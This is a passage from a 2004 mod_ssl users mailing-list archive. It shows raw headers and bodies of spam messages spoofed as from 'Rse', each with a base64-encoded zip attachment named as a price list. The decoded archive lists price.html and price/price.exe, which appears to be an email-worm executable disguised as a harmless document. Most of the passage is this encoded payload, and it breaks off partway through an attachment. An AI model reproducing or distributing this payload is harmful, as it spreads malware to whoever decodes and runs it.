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

----------mckhfjjvyawczssgkaxq--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 19:35:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 921B0A8D0B; Mon,  9 Aug 2004 19:35:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from MailServer.org (h-67-100-191-234.mclnva23.covad.net [67.100.191.234])
	by master.modssl.org (Postfix) with SMTP id 57CA5A8D04
	for ; Mon,  9 Aug 2004 19:35:28 +0200 (CEST)
Date: Mon, 09 Aug 2004 13:30:54 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------rxrscvnulkaprsdpchcp"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------rxrscvnulkaprsdpchcp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


 price







----------rxrscvnulkaprsdpchcp
Content-Type: application/octet-stream; name="new_price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="new_price.zip"

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

----------rxrscvnulkaprsdpchcp--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 20:16:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8EA95A8945; Mon,  9 Aug 2004 20:16:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from W49774.net (156.179.205.68.cfl.rr.com [68.205.179.156])
	by master.modssl.org (Postfix) with SMTP id 74E08A893A
	for ; Mon,  9 Aug 2004 20:16:17 +0200 (CEST)
Date: Mon, 09 Aug 2004 14:16:12 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------royujerihrffcgwnwbyh"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------royujerihrffcgwnwbyh
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------royujerihrffcgwnwbyh
Content-Type: application/octet-stream; name="price_08.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price_08.zip"

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
